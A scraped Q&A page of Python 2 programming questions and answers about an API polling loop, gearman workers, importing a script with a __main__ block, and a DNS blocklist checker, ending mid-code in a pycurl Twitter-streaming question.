Python: calling APIs and printing events randomly

I have an interval of 60 and want to print 6 events every minute, but it prints 11, 12, or 13 events at random each minute. Why is that? Is it because of my code, or what other factors could cause this?
My code is:
import logging
import httplib
import simplejson as json
import socket
import time
import datetime
import urllib2
import sys
import xml.dom.minidom
from bs4 import BeautifulSoup as soup
SCHEME = """<scheme>
<title>testingCurrentWeatherSG</title>
<description>Get data from forecast.</description>
<use_external_validation>true</use_external_validation>
<streaming_mode>simple</streaming_mode>
<endpoint>
<args>
<arg name="intervalone">
<title>Intervalone</title>
<description>How long to refresh this query?</description>
</arg>
</args>
</endpoint>
</scheme>
"""
def do_scheme():
print SCHEME
## Utility functions
def fahrenheit(fahren):
return (fahren-32) * 5.0/9.0
def get_percent(num):
return num * 100.
## Responses
def get_response(conn, url):
try:
conn.request('GET', url)
result = conn.getresponse()
data = result.read()
return json.loads(data)
except socket.timeout:
return None
## Printing
def print_forecast(name, di):
# Print the forecast from 'di', for location 'name'
# name is the name of the location, di is the API response
psi_avg=20
current = di['currently']
for key, value in sorted(current.iteritems()):
if key in ['cloudCover', 'icon', 'ozone', 'precipIntensity', # time
'precipProbability', 'precipType', 'pressure', 'summary',
'visibility', 'windBearing', 'windSpeed']:
print '{0} : {1}'.format(key, value)
elif key in ['temperature', 'dewPoint']:
print '%s: %.2f' % (key, fahrenheit(value))
elif key == 'humidity':
print '%s: %.2f' % (key, get_percent(value))
print 'psiAverage : ' + str(psi_avg)
print 'latitude : ' + str(di['latitude'])
print 'longitude : ' + str(di['longitude'])
print 'location : ' + str(name)
print
def weather_Connection(intervalone):
host = 'api.forecast.io'
conn = httplib.HTTPSConnection(host, timeout=60) # adjust timeout as desired
try:
urlnyp = '/forecast/59ff8cb7661d231f2967c2663c0a3bdc/1.37871,103.848808'
conn.request('GET', urlnyp)
resultnyp = conn.getresponse()
contentnyp = resultnyp.read()
except socket.timeout:
print 'socket timeout'
return
# the locations and urls for the api calls
urls = {
'Choa Chu Kang': '/forecast/59ff8cb7661d231f2967c2663c0a3bdc/1.394557,103.746396',
'Kallang': '/forecast/59ff8cb7661d231f2967c2663c0a3bdc/1.311469,103.871399',
'Jurong West': '/forecast/59ff8cb7661d231f2967c2663c0a3bdc/1.352008,103.698599',
'Redhill': '/forecast/59ff8cb7661d231f2967c2663c0a3bdc/1.289732,103.81675',
'Tampines': '/forecast/59ff8cb7661d231f2967c2663c0a3bdc/1.353092,103.945229',
'Yishun': '/forecast/59ff8cb7661d231f2967c2663c0a3bdc/1.429463,103.84022',
}
responses = {}
for i, (name, url) in enumerate(sorted(urls.iteritems())):
response = get_response(conn, url)
if not response:
print 'socket timeout on url#%d: %s' % (i, url)
return
responses[name] = response
conn.close()
# print the forecast
for name, data in responses.iteritems():
print_forecast(name, data)
def get_config():
#Read XML Configuration data passed from splunkd on stdin
config = {}
try:
# read everything from stdin
config_str = sys.stdin.read()
# parse the config XML
doc = xml.dom.minidom.parseString(config_str)
root = doc.documentElement
conf_node = root.getElementsByTagName("configuration")[0]
if conf_node:
logging.debug("XML: found configuration")
stanza = conf_node.getElementsByTagName("stanza")[0]
if stanza:
stanza_name = stanza.getAttribute("name")
if stanza_name:
logging.debug("XML: found stanza " + stanza_name)
config["name"] = stanza_name
params = stanza.getElementsByTagName("param")
for param in params:
param_name = param.getAttribute("name")
logging.debug("XML: found param '%s'" % param_name)
if param_name and param.firstChild and \
param.firstChild.nodeType == param.firstChild.TEXT_NODE:
data = param.firstChild.data
config[param_name] = data
logging.debug("XML: '%s' -> '%s'" % (param_name, data))
if not config:
raise Exception, "Invalid configuration received from Splunk."
except Exception, e:
raise Exception, "Error getting Splunk configuration via STDIN: %s" % str(e)
return config
def run():
#The Main function that starts the action. The thread will sleep for however many seconds are configured via the Input.
# config = get_config()
#
#
# intervalone = config["intervalone"]
intervalone = 60
while True:
weather_Connection(intervalone)
logging.info("Sleeping for %s seconds" %(intervalone))
time.sleep(float(intervalone))
if __name__ == '__main__':
if len(sys.argv) > 1:
if sys.argv[1] == "--scheme":
do_scheme()
else:
run()
sys.exit(0)

I've checked and tried your code and it works fine. Try replacing
logging.info("Sleeping for %s seconds" %(intervalone))
with
print("Sleeping for %s seconds" % (intervalone))
You should see this statement every 6 forecasts.
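If you would rather keep the logging call, the likely reason it printed nothing is that the root logger defaults to the WARNING level, so INFO messages are discarded until logging is configured. A minimal sketch:
import logging
# Lower the root logger's threshold so INFO messages are emitted (to stderr by default).
logging.basicConfig(level=logging.INFO)
logging.info("Sleeping for %s seconds", 60)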
Note: why return from weather_Connection() here?
for i, (name, url) in enumerate(sorted(urls.iteritems())):
response = get_response(conn, url)
if not response:
print 'socket timeout on url#%d: %s' % (i, url)
return
responses[name] = response
You can just skip the failed URL with continue:
for i, (name, url) in enumerate(sorted(urls.iteritems())):
response = get_response(conn, url)
if not response:
print 'socket timeout on url#%d: %s' % (i, url)
continue
responses[name] = response

Related

Keep gearman worker in listening mode after loading file content

I want to keep some file content loaded in memory so that it can be queried and retrieved instantly.
In the gearman worker, I load the file and put the worker in listening mode. When I make a request using the gearman client, the worker returns the loaded content only once; the next time, the client receives None.
worker:
import sys
import json
import traceback
import gearman
from collections import defaultdict
class GetLexiconFiles(object):
def __init__(self):
self.gm_worker = gearman.GearmanWorker(['localhost:4730'])
self.loadFiles()
self.gm_worker.register_task('load_db', self.task_listener_reverse)
#self.loadFiles()
#self.gm_worker.work()
def task_listener_reverse(self, gearman_worker, gearman_job):
k=float('inf')
#print "Started loading file"
self.input_text = self.input_text.split('\n')
print "Loading completed"
lexicon = defaultdict(list)
for i, line in enumerate(self.input_text):
#print "line is : ", line
if i >= k: break
#if i % 100000 == 0: print >>sys.stderr, i
try:
if line != '':
nl, dbs = line.split(' ', 1)
nl = int(nl)
dbs = self.str2obj(dbs)
lexicon[nl].append(dbs)
else:
pass
except:
print >>sys.stderr, 'could not parse line %r' % line
print traceback.format_exc()
continue
return json.dumps(lexicon)
if __name__ == '__main__':
GetLexiconFiles().gm_worker.work()
client:
import gearman
from gearman.constants import JOB_UNKNOWN
def check_request_status(job_request):
if job_request.complete:
#data = json.loads(job_request.result)
print "Job %s finished! Result: %s - %s" % (job_request.job.unique, job_request.state, job_request.result)
elif job_request.timed_out:
print "Job %s timed out!"
elif job_request.state == JOB_UNKNOWN:
print "Job %s connection failed!"
gm_client = gearman.GearmanClient(['localhost:4730'])
tasks = [{'task': 'load_lexicon', 'data': 'This is testing sentence'}, {'task': 'load_db', 'data': 'This is db testing'}]
submitted_requests = gm_client.submit_multiple_jobs(tasks, background=False, wait_until_complete=False)
completed_requests = gm_client.wait_until_jobs_completed(submitted_requests)
print completed_requests[1].result
for completed_job_request in completed_requests:
check_request_status(completed_job_request)
self.input_text = self.input_text.split('\n')
With this line of code you are converting a string to a list of strings.
Since you save the result back into self.input_text, the next time the function gets called self.input_text will already be a list, and it'll raise an exception.
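A minimal sketch of the fix: split into a local variable so self.input_text stays a string across calls (the original error handling is omitted for brevity):
def task_listener_reverse(self, gearman_worker, gearman_job):
    # Use a local list; the attribute keeps its original string value.
    lines = self.input_text.split('\n')
    lexicon = defaultdict(list)
    for line in lines:
        if line != '':
            nl, dbs = line.split(' ', 1)
            lexicon[int(nl)].append(self.str2obj(dbs))
    return json.dumps(lexicon)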

Import a Python script with a __main__ block

I have a Python script that has a __main__ block and takes all its values as parameters.
I want to import it and use it in my own script. I can import it, but I don't know how to use it.
As you can see below, the __main__ part is a bit complicated, and rewriting it would take time because I don't even know what most of the code means.
Is there any way to import and use the code as a function?
import os
import sys
import time
import base64
from urllib2 import urlopen
from urllib2 import Request
from urllib2 import HTTPError
from urllib import urlencode
from urllib import quote
from exceptions import Exception
from email.mime.multipart import MIMEMultipart
from email.mime.base import MIMEBase
from email.mime.application import MIMEApplication
from email.encoders import encode_noop
from api_util import json2python, python2json
class MalformedResponse(Exception):
pass
class RequestError(Exception):
pass
class Client(object):
default_url = 'http://nova.astrometry.net/api/'
def __init__(self,
apiurl = default_url):
self.session = None
self.apiurl = apiurl
def get_url(self, service):
return self.apiurl + service
def send_request(self, service, args={}, file_args=None):
'''
service: string
args: dict
'''
if self.session is not None:
args.update({ 'session' : self.session })
print 'Python:', args
json = python2json(args)
print 'Sending json:', json
url = self.get_url(service)
print 'Sending to URL:', url
# If we're sending a file, format a multipart/form-data
if file_args is not None:
m1 = MIMEBase('text', 'plain')
m1.add_header('Content-disposition', 'form-data; name="request-json"')
m1.set_payload(json)
m2 = MIMEApplication(file_args[1],'octet-stream',encode_noop)
m2.add_header('Content-disposition',
'form-data; name="file"; filename="%s"' % file_args[0])
#msg.add_header('Content-Disposition', 'attachment',
# filename='bud.gif')
#msg.add_header('Content-Disposition', 'attachment',
# filename=('iso-8859-1', '', 'FuSballer.ppt'))
mp = MIMEMultipart('form-data', None, [m1, m2])
# Make a custom generator to format it the way we need.
from cStringIO import StringIO
from email.generator import Generator
class MyGenerator(Generator):
def __init__(self, fp, root=True):
Generator.__init__(self, fp, mangle_from_=False,
maxheaderlen=0)
self.root = root
def _write_headers(self, msg):
# We don't want to write the top-level headers;
# they go into Request(headers) instead.
if self.root:
return
# We need to use \r\n line-terminator, but Generator
# doesn't provide the flexibility to override, so we
# have to copy-n-paste-n-modify.
for h, v in msg.items():
print >> self._fp, ('%s: %s\r\n' % (h,v)),
# A blank line always separates headers from body
print >> self._fp, '\r\n',
# The _write_multipart method calls "clone" for the
# subparts. We hijack that, setting root=False
def clone(self, fp):
return MyGenerator(fp, root=False)
fp = StringIO()
g = MyGenerator(fp)
g.flatten(mp)
data = fp.getvalue()
headers = {'Content-type': mp.get('Content-type')}
if False:
print 'Sending headers:'
print ' ', headers
print 'Sending data:'
print data[:1024].replace('\n', '\\n\n').replace('\r', '\\r')
if len(data) > 1024:
print '...'
print data[-256:].replace('\n', '\\n\n').replace('\r', '\\r')
print
else:
# Else send x-www-form-encoded
data = {'request-json': json}
print 'Sending form data:', data
data = urlencode(data)
print 'Sending data:', data
headers = {}
request = Request(url=url, headers=headers, data=data)
try:
f = urlopen(request)
txt = f.read()
print 'Got json:', txt
result = json2python(txt)
print 'Got result:', result
stat = result.get('status')
print 'Got status:', stat
if stat == 'error':
errstr = result.get('errormessage', '(none)')
raise RequestError('server error message: ' + errstr)
return result
except HTTPError, e:
print 'HTTPError', e
txt = e.read()
open('err.html', 'wb').write(txt)
print 'Wrote error text to err.html'
def login(self, apikey):
args = { 'apikey' : apikey }
result = self.send_request('login', args)
sess = result.get('session')
print 'Got session:', sess
if not sess:
raise RequestError('no session in result')
self.session = sess
def _get_upload_args(self, **kwargs):
args = {}
for key,default,typ in [('allow_commercial_use', 'd', str),
('allow_modifications', 'd', str),
('publicly_visible', 'y', str),
('scale_units', None, str),
('scale_type', None, str),
('scale_lower', None, float),
('scale_upper', None, float),
('scale_est', None, float),
('scale_err', None, float),
('center_ra', None, float),
('center_dec', None, float),
('radius', None, float),
('downsample_factor', None, int),
('tweak_order', None, int),
('crpix_center', None, bool),
# image_width, image_height
]:
if key in kwargs:
val = kwargs.pop(key)
val = typ(val)
args.update({key: val})
elif default is not None:
args.update({key: default})
print 'Upload args:', args
return args
def url_upload(self, url, **kwargs):
args = dict(url=url)
args.update(self._get_upload_args(**kwargs))
result = self.send_request('url_upload', args)
return result
def upload(self, fn, **kwargs):
args = self._get_upload_args(**kwargs)
try:
f = open(fn, 'rb')
result = self.send_request('upload', args, (fn, f.read()))
return result
except IOError:
print 'File %s does not exist' % fn
raise
def submission_images(self, subid):
result = self.send_request('submission_images', {'subid':subid})
return result.get('image_ids')
def overlay_plot(self, service, outfn, wcsfn, wcsext=0):
from astrometry.util import util as anutil
wcs = anutil.Tan(wcsfn, wcsext)
params = dict(crval1 = wcs.crval[0], crval2 = wcs.crval[1],
crpix1 = wcs.crpix[0], crpix2 = wcs.crpix[1],
cd11 = wcs.cd[0], cd12 = wcs.cd[1],
cd21 = wcs.cd[2], cd22 = wcs.cd[3],
imagew = wcs.imagew, imageh = wcs.imageh)
result = self.send_request(service, {'wcs':params})
print 'Result status:', result['status']
plotdata = result['plot']
plotdata = base64.b64decode(plotdata)
open(outfn, 'wb').write(plotdata)
print 'Wrote', outfn
def sdss_plot(self, outfn, wcsfn, wcsext=0):
return self.overlay_plot('sdss_image_for_wcs', outfn,
wcsfn, wcsext)
def galex_plot(self, outfn, wcsfn, wcsext=0):
return self.overlay_plot('galex_image_for_wcs', outfn,
wcsfn, wcsext)
def myjobs(self):
result = self.send_request('myjobs/')
return result['jobs']
def job_status(self, job_id, justdict=False):
result = self.send_request('jobs/%s' % job_id)
if justdict:
return result
stat = result.get('status')
if stat == 'success':
result = self.send_request('jobs/%s/calibration' % job_id)
print 'Calibration:', result
result = self.send_request('jobs/%s/tags' % job_id)
print 'Tags:', result
result = self.send_request('jobs/%s/machine_tags' % job_id)
print 'Machine Tags:', result
result = self.send_request('jobs/%s/objects_in_field' % job_id)
print 'Objects in field:', result
result = self.send_request('jobs/%s/annotations' % job_id)
print 'Annotations:', result
result = self.send_request('jobs/%s/info' % job_id)
print 'Calibration:', result
return stat
def sub_status(self, sub_id, justdict=False):
result = self.send_request('submissions/%s' % sub_id)
if justdict:
return result
return result.get('status')
def jobs_by_tag(self, tag, exact):
exact_option = 'exact=yes' if exact else ''
result = self.send_request(
'jobs_by_tag?query=%s&%s' % (quote(tag.strip()), exact_option),
{},
)
return result
if __name__ == '__main__':
import optparse
parser = optparse.OptionParser()
parser.add_option('--server', dest='server', default=Client.default_url,
help='Set server base URL (eg, %default)')
parser.add_option('--apikey', '-k', dest='apikey',
help='API key for Astrometry.net web service; if not given will check AN_API_KEY environment variable')
parser.add_option('--upload', '-u', dest='upload', help='Upload a file')
parser.add_option('--wait', '-w', dest='wait', action='store_true', help='After submitting, monitor job status')
parser.add_option('--wcs', dest='wcs', help='Download resulting wcs.fits file, saving to given filename; implies --wait if --urlupload or --upload')
parser.add_option('--kmz', dest='kmz', help='Download resulting kmz file, saving to given filename; implies --wait if --urlupload or --upload')
parser.add_option('--urlupload', '-U', dest='upload_url', help='Upload a file at specified url')
parser.add_option('--scale-units', dest='scale_units',
choices=('arcsecperpix', 'arcminwidth', 'degwidth', 'focalmm'), help='Units for scale estimate')
#parser.add_option('--scale-type', dest='scale_type',
# choices=('ul', 'ev'), help='Scale bounds: lower/upper or estimate/error')
parser.add_option('--scale-lower', dest='scale_lower', type=float, help='Scale lower-bound')
parser.add_option('--scale-upper', dest='scale_upper', type=float, help='Scale upper-bound')
parser.add_option('--scale-est', dest='scale_est', type=float, help='Scale estimate')
parser.add_option('--scale-err', dest='scale_err', type=float, help='Scale estimate error (in PERCENT), eg "10" if your estimate can be off by 10%')
parser.add_option('--ra', dest='center_ra', type=float, help='RA center')
parser.add_option('--dec', dest='center_dec', type=float, help='Dec center')
parser.add_option('--radius', dest='radius', type=float, help='Search radius around RA,Dec center')
parser.add_option('--downsample', dest='downsample_factor', type=int, help='Downsample image by this factor')
parser.add_option('--parity', dest='parity', choices=('0','1'), help='Parity (flip) of image')
parser.add_option('--tweak-order', dest='tweak_order', type=int, help='SIP distortion order (default: 2)')
parser.add_option('--crpix-center', dest='crpix_center', action='store_true', default=None, help='Set reference point to center of image?')
parser.add_option('--sdss', dest='sdss_wcs', nargs=2, help='Plot SDSS image for the given WCS file; write plot to given PNG filename')
parser.add_option('--galex', dest='galex_wcs', nargs=2, help='Plot GALEX image for the given WCS file; write plot to given PNG filename')
parser.add_option('--substatus', '-s', dest='sub_id', help='Get status of a submission')
parser.add_option('--jobstatus', '-j', dest='job_id', help='Get status of a job')
parser.add_option('--jobs', '-J', dest='myjobs', action='store_true', help='Get all my jobs')
parser.add_option('--jobsbyexacttag', '-T', dest='jobs_by_exact_tag', help='Get a list of jobs associated with a given tag--exact match')
parser.add_option('--jobsbytag', '-t', dest='jobs_by_tag', help='Get a list of jobs associated with a given tag')
parser.add_option( '--private', '-p',
dest='public',
action='store_const',
const='n',
default='y',
help='Hide this submission from other users')
parser.add_option('--allow_mod_sa','-m',
dest='allow_mod',
action='store_const',
const='sa',
default='d',
help='Select license to allow derivative works of submission, but only if shared under same conditions of original license')
parser.add_option('--no_mod','-M',
dest='allow_mod',
action='store_const',
const='n',
default='d',
help='Select license to disallow derivative works of submission')
parser.add_option('--no_commercial','-c',
dest='allow_commercial',
action='store_const',
const='n',
default='d',
help='Select license to disallow commercial use of submission')
opt,args = parser.parse_args()
if opt.apikey is None:
# try the environment
opt.apikey = os.environ.get('AN_API_KEY', None)
if opt.apikey is None:
parser.print_help()
print
print 'You must either specify --apikey or set AN_API_KEY'
sys.exit(-1)
args = {}
args['apiurl'] = opt.server
c = Client(**args)
c.login(opt.apikey)
if opt.upload or opt.upload_url:
if opt.wcs or opt.kmz:
opt.wait = True
kwargs = dict(
allow_commercial_use=opt.allow_commercial,
allow_modifications=opt.allow_mod,
publicly_visible=opt.public)
if opt.scale_lower and opt.scale_upper:
kwargs.update(scale_lower=opt.scale_lower,
scale_upper=opt.scale_upper,
scale_type='ul')
elif opt.scale_est and opt.scale_err:
kwargs.update(scale_est=opt.scale_est,
scale_err=opt.scale_err,
scale_type='ev')
elif opt.scale_lower or opt.scale_upper:
kwargs.update(scale_type='ul')
if opt.scale_lower:
kwargs.update(scale_lower=opt.scale_lower)
if opt.scale_upper:
kwargs.update(scale_upper=opt.scale_upper)
for key in ['scale_units', 'center_ra', 'center_dec', 'radius',
'downsample_factor', 'tweak_order', 'crpix_center',]:
if getattr(opt, key) is not None:
kwargs[key] = getattr(opt, key)
if opt.parity is not None:
kwargs.update(parity=int(opt.parity))
if opt.upload:
upres = c.upload(opt.upload, **kwargs)
if opt.upload_url:
upres = c.url_upload(opt.upload_url, **kwargs)
stat = upres['status']
if stat != 'success':
print 'Upload failed: status', stat
print upres
sys.exit(-1)
opt.sub_id = upres['subid']
if opt.wait:
if opt.job_id is None:
if opt.sub_id is None:
print "Can't --wait without a submission id or job id!"
sys.exit(-1)
while True:
stat = c.sub_status(opt.sub_id, justdict=True)
print 'Got status:', stat
jobs = stat.get('jobs', [])
if len(jobs):
for j in jobs:
if j is not None:
break
if j is not None:
print 'Selecting job id', j
opt.job_id = j
break
time.sleep(5)
success = False
while True:
stat = c.job_status(opt.job_id, justdict=True)
print 'Got job status:', stat
if stat.get('status','') in ['success']:
success = (stat['status'] == 'success')
break
time.sleep(5)
if success:
c.job_status(opt.job_id)
# result = c.send_request('jobs/%s/calibration' % opt.job_id)
# print 'Calibration:', result
# result = c.send_request('jobs/%s/tags' % opt.job_id)
# print 'Tags:', result
# result = c.send_request('jobs/%s/machine_tags' % opt.job_id)
# print 'Machine Tags:', result
# result = c.send_request('jobs/%s/objects_in_field' % opt.job_id)
# print 'Objects in field:', result
#result = c.send_request('jobs/%s/annotations' % opt.job_id)
#print 'Annotations:', result
retrieveurls = []
if opt.wcs:
# We don't need the API for this, just construct URL
url = opt.server.replace('/api/', '/wcs_file/%i' % opt.job_id)
retrieveurls.append((url, opt.wcs))
if opt.kmz:
url = opt.server.replace('/api/', '/kml_file/%i/' % opt.job_id)
retrieveurls.append((url, opt.kmz))
for url,fn in retrieveurls:
print 'Retrieving file from', url, 'to', fn
f = urlopen(url)
txt = f.read()
w = open(fn, 'wb')
w.write(txt)
w.close()
print 'Wrote to', fn
opt.job_id = None
opt.sub_id = None
if opt.sdss_wcs:
(wcsfn, outfn) = opt.sdss_wcs
c.sdss_plot(outfn, wcsfn)
if opt.galex_wcs:
(wcsfn, outfn) = opt.galex_wcs
c.galex_plot(outfn, wcsfn)
if opt.sub_id:
print c.sub_status(opt.sub_id)
if opt.job_id:
print c.job_status(opt.job_id)
#result = c.send_request('jobs/%s/annotations' % opt.job_id)
#print 'Annotations:', result
if opt.jobs_by_tag:
tag = opt.jobs_by_tag
print c.jobs_by_tag(tag, None)
if opt.jobs_by_exact_tag:
tag = opt.jobs_by_exact_tag
print c.jobs_by_tag(tag, 'yes')
if opt.myjobs:
jobs = c.myjobs()
print jobs
#print c.submission_images(1)
No, there is no clean way to do so. When the module is imported, its code is executed and all global variables are set as attributes of the module object. So if part of the code is not executed at all (it is guarded by the __main__ condition), there is no clean way to get access to that code. You can, however, run this module's code with a substituted __name__, but that's very hackish.
You should refactor this module, move the whole __main__ part into a function, and call it like this:
def main():
do_everything()
if __name__ == '__main__':
main()
This way consumer apps will be able to run the code without having to run it in a separate process.
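A consumer could then, for example (names hypothetical, assuming the script above was saved as astro_client.py and its __main__ body moved into main()):
import sys
import astro_client
# main() still parses sys.argv via optparse, so simulate a command line.
sys.argv = ['astro_client.py', '--apikey', 'XXXX', '--jobs']
astro_client.main()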
Use the runpy module from the Python 3 standard library.
Note that data can be passed to and from the called script:
# top.py
import runpy
import sys
sys.argv += ["another parameter"]
module_globals_dict = runpy.run_path("other_script.py",
init_globals = globals(), run_name="__main__")
print(module_globals_dict["return_value"])
# other_script.py
# Note we did not load sys module, it gets passed to this script
script_name = sys.argv[0]
print(f"Script {script_name} loaded")
if __name__ == "__main__":
params = sys.argv[1:]
print(f"Script {script_name} run with params: {params}")
return_value = f"{script_name} Done"
From what you're saying, you want to call a function in the script that is importing the module, so try:
import __main__
__main__.myfunc()
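For instance, a sketch with hypothetical names; this only works if the importing script defines myfunc before the import statement runs:
# main_script.py
def myfunc():
    print('called back into the importing script')
import helper_module # helper_module contains the two lines above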

Pass array into class in Python

I'm a PHP guy and I don't understand Python very well, so excuse me if my question is stupid.
I have 2 PHP scripts (client.php and worker.php) using Gearman that I need to convert to Python versions. I have been able to do it partially, but I'm stuck. First, here are my two scripts:
client.py
#!/usr/bin/env python
import gearman
import json
from gearman.constants import JOB_UNKNOWN
RBLS = [
'b.barracudacentral.org',
'bl.emailbasura.org'
]
IP = '1.2.3.4'
def check_request_status(job_request):
if job_request.complete:
print "Job %s finished! Result: %s - %s" % (job_request.job.unique, job_request.state, job_request.result)
elif job_request.timed_out:
print "Job %s timed out!" % job_request.unique
elif job_request.state == JOB_UNKNOWN:
print "Job %s connection failed!" % job_request.unique
data = {"ip": IP, "rbls": RBLS}
serialized_data = json.dumps(data)
gm_client = gearman.GearmanClient(['localhost:4730'])
completed_job_request = gm_client.submit_job("runcheck", serialized_data)
check_request_status(completed_job_request)
worker.py
#!/usr/bin/env python
import gearman
import sys
import socket
import re
import json
from dns.resolver import Resolver, NXDOMAIN, NoNameservers, Timeout, NoAnswer
from threading import Thread
# These hardcoded RBLS need to be passed in by the gearman client script
# RBLS = ['xbl.spamhaus.org', 'zen.spamhaus.org']
class Lookup(Thread):
def __init__(self, host, dnslist, listed, resolver):
Thread.__init__(self)
self.host = host
self.listed = listed
self.dnslist = dnslist
self.resolver = resolver
def run(self):
try:
host_record = self.resolver.query(self.host, "A")
if len(host_record) > 0:
self.listed[self.dnslist]['LISTED'] = True
self.listed[self.dnslist]['HOST'] = host_record[0].address
text_record = self.resolver.query(self.host, "TXT")
if len(text_record) > 0:
self.listed[self.dnslist]['TEXT'] = "\n".join(text_record[0].strings)
self.listed[self.dnslist]['ERROR'] = False
except NXDOMAIN:
self.listed[self.dnslist]['ERROR'] = True
self.listed[self.dnslist]['ERRORTYPE'] = NXDOMAIN
except NoNameservers:
self.listed[self.dnslist]['ERROR'] = True
self.listed[self.dnslist]['ERRORTYPE'] = NoNameservers
except Timeout:
self.listed[self.dnslist]['ERROR'] = True
self.listed[self.dnslist]['ERRORTYPE'] = Timeout
except NameError:
self.listed[self.dnslist]['ERROR'] = True
self.listed[self.dnslist]['ERRORTYPE'] = NameError
except NoAnswer:
self.listed[self.dnslist]['ERROR'] = True
self.listed[self.dnslist]['ERRORTYPE'] = NoAnswer
class RBLSearch(object):
def __init__(self, lookup_host):
self.lookup_host = lookup_host
self._listed = None
self.resolver = Resolver()
self.resolver.timeout = 0.2
self.resolver.lifetime = 1.0
def search(self):
if self._listed is not None:
pass
else:
host = self.lookup_host.split(".")
host = ".".join(list(reversed(host)))
self._listed = {'SEARCH_HOST': self.lookup_host}
threads = []
for LIST in RBLS:
self._listed[LIST] = {'LISTED': False}
query = Lookup("%s.%s" % (host, LIST), LIST, self._listed, self.resolver)
threads.append(query)
query.start()
for thread in threads:
thread.join()
return self._listed
listed = property(search)
def print_results(self):
listed = self.listed
print("")
print("--- DNSBL Report for %s ---" % listed['SEARCH_HOST'])
for key in listed:
if key == 'SEARCH_HOST':
continue
if not listed[key].get('ERROR'):
if listed[key]['LISTED']:
print("Results for %s: %s" % (key, listed[key]['LISTED']))
print(" + Host information: %s" % \
(listed[key]['HOST']))
if 'TEXT' in listed[key].keys():
print(" + Additional information: %s" % \
(listed[key]['TEXT']))
else:
#print "*** Error contacting %s ***" % key
pass
def task_listener_runcheck(gearman_worker, gearman_job):
jdata = json.loads(gearman_job.data)
host = jdata['ip']
ip = host
RBLS = jdata['rbls']
print("Looking up: %s (please wait)" % host)
pat = re.compile(r"\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}")
is_ip_address = pat.match(host)
if not is_ip_address:
try:
ip = socket.gethostbyname(host)
print("Hostname %s resolved to ip %s" % (host,ip))
except socket.error:
print("Hostname %s can't be resolved" % host)
ip = ""
if ip:
searcher = RBLSearch(ip)
searcher.print_results()
return "RunCheck was successfull"
gm_worker = gearman.GearmanWorker(['localhost:4730'])
gm_worker.set_client_id('python-worker')
gm_worker.register_task('runcheck', task_listener_runcheck)
gm_worker.work()
Here is how these 2 scripts work: client.py passes the IP address and an array of RBLs to worker.py. The worker then takes the IP address and checks it against all the RBLs.
The problem is that I don't know how to use RBLS inside the RBLSearch class. It works if I hardcode RBLS at the beginning of the script (see worker.py, line 12), but it does not work if I define RBLS in task_listener_runcheck.
I have been able to solve it. Here is the edited version (in case anyone wants it):
worker.py
#!/usr/bin/env python
import gearman
import sys
import socket
import re
import json
from dns.resolver import Resolver, NXDOMAIN, NoNameservers, Timeout, NoAnswer
from threading import Thread
class Lookup(Thread):
def __init__(self, host, dnslist, listed, resolver):
Thread.__init__(self)
self.host = host
self.listed = listed
self.dnslist = dnslist
self.resolver = resolver
def run(self):
try:
host_record = self.resolver.query(self.host, "A")
if len(host_record) > 0:
self.listed[self.dnslist]['LISTED'] = True
self.listed[self.dnslist]['HOST'] = host_record[0].address
text_record = self.resolver.query(self.host, "TXT")
if len(text_record) > 0:
self.listed[self.dnslist]['TEXT'] = "\n".join(text_record[0].strings)
self.listed[self.dnslist]['ERROR'] = False
except NXDOMAIN:
self.listed[self.dnslist]['ERROR'] = False
self.listed[self.dnslist]['ERRORTYPE'] = NXDOMAIN
except NoNameservers:
self.listed[self.dnslist]['ERROR'] = True
self.listed[self.dnslist]['ERRORTYPE'] = NoNameservers
self.listed[self.dnslist]['TEXT'] = "%s - The operation timed out." % self.host
except Timeout:
self.listed[self.dnslist]['ERROR'] = True
self.listed[self.dnslist]['ERRORTYPE'] = Timeout
self.listed[self.dnslist]['TEXT'] = "%s - The operation timed out." % self.host
except NameError:
self.listed[self.dnslist]['ERROR'] = True
self.listed[self.dnslist]['ERRORTYPE'] = NameError
self.listed[self.dnslist]['TEXT'] = "%s - NameError" % self.host
except NoAnswer:
self.listed[self.dnslist]['ERROR'] = True
self.listed[self.dnslist]['ERRORTYPE'] = NoAnswer
self.listed[self.dnslist]['TEXT'] = "%s - The response did not contain an answer to the question." % self.host
class RBLSearch(object):
def __init__(self, lookup_host, rbls):
self.lookup_host = lookup_host
self.rbls = rbls
self._listed = None
self.resolver = Resolver()
self.resolver.timeout = 0.2
self.resolver.lifetime = 1.0
def search(self):
if self._listed is not None:
pass
else:
host = self.lookup_host.split(".")
host = ".".join(list(reversed(host)))
self._listed = {'SEARCH_HOST': self.lookup_host}
threads = []
for LIST in self.rbls:
self._listed[LIST] = {'LISTED': False}
query = Lookup("%s.%s" % (host, LIST), LIST, self._listed, self.resolver)
threads.append(query)
query.start()
for thread in threads:
thread.join()
return self._listed
listed = property(search)
def print_results(self):
listed = self.listed
print("")
print("--- DNSBL Report for %s ---" % listed['SEARCH_HOST'])
for key in listed:
if key == 'SEARCH_HOST':
continue
if not listed[key].get('ERROR'):
if listed[key]['LISTED']:
print("Results for %s: %s" % (key, listed[key]['LISTED']))
print(" + Host information: %s" % \
(listed[key]['HOST']))
if 'TEXT' in listed[key].keys():
print(" + Additional information: %s" % \
(listed[key]['TEXT']))
else:
print("Not listed in %s" % (key))
else:
#print "*** Error contacting %s ***" % key
pass
def task_listener_runcheck(gearman_worker, gearman_job):
jdata = json.loads(gearman_job.data)
host = jdata['ip']
rbls = jdata['rbls']
ip = host
print("Looking up: %s (please wait)" % host)
pat = re.compile(r"\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}")
is_ip_address = pat.match(host)
if not is_ip_address:
try:
ip = socket.gethostbyname(host)
print("Hostname %s resolved to ip %s" % (host,ip))
except socket.error:
print("Hostname %s can't be resolved" % host)
ip = ""
if ip:
searcher = RBLSearch(ip, rbls)
searcher.print_results()
return "RunCheck was successfull"
gm_worker = gearman.GearmanWorker(['localhost:4730'])
gm_worker.set_client_id('python-worker')
gm_worker.register_task('runcheck', task_listener_runcheck)
gm_worker.work()

Searching for keywords with pycurl: Python is stuck at the shell, returning nothing

I am trying to get tweets related to the keywords in the code, but at the Python shell there is nothing: just the cursor, no traceback, nothing. The code is here:
import time
import pycurl
import urllib
import json
import oauth2 as oauth
API_ENDPOINT_URL = 'https://stream.twitter.com/1.1/statuses/filter.json'
USER_AGENT = 'TwitterStream 1.0' # This can be anything really
# You need to replace these with your own values
OAUTH_KEYS = {'consumer_key': 'ABC',
'consumer_secret': 'ABC',
'access_token_key': 'ABC',
'access_token_secret': 'ABC'}
# These values are posted when setting up the connection
POST_PARAMS = {'include_entities': 0,
'stall_warning': 'true',
